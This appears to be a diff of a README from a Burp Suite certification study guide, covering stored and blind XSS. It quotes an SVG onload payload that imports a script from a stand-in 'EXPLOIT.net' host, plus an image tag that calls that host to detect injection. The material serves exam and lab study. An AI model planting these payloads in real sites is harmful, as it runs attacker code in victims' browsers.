botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 ### Stored XSS

+>Stored XSS can also be Blind XSS.
+>If alert payload do not trigger, see [NahamSec blind xss video](https://youtu.be/QSiXHb97E1c?si=ta4Rro6J39QlqVCR&t=428) payload for victim to click, example: `<svg/onload=import('//EXPLOIT.net/blind_xss')>`
+>If stored input is redirecting victim that click on the links, it send request to exploit server.
 >Use the following sample code to ***identify*** stored XSS.
-If stored input is redirecting victim that click on the links, it send request to exploit server.

 ```HTML
 <img src="https://EXPLOIT.net/img">